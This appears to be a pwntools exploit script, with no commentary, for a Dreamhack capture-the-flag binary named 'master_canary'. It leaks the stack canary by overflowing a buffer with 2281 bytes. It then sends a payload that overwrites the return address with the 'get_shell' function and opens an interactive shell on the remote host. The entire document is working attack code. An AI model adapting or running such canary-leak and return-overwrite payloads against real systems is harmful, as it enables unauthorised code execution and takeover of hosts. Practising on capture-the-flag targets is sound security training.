from pwn import *
#p = process("./master_canary")
p = remote("host1.dreamhack.games", 10340)
pause()
elf = ELF("./master_canary")

win = elf.symbols['get_shell']
p.sendline("1")
sleep(0.1)
p.sendline("2")
sleep(0.1)
p.sendline("2281")
sleep(0.1)
p.sendline("a" * 2281)
sleep(0.1)
p.recvuntil("Data: ")
sleep(0.1)
p.recvuntil("a" * 2280)
canary = u64(p.recv(8)) - ord("a")
sleep(0.1)
p.success("canary : " + hex(canary))
sleep(0.1)
p.sendline("3")
sleep(0.1)
p.sendline("a" * 32 + p64(canary) * 2 + p64(win) * 4)
p.interactive()
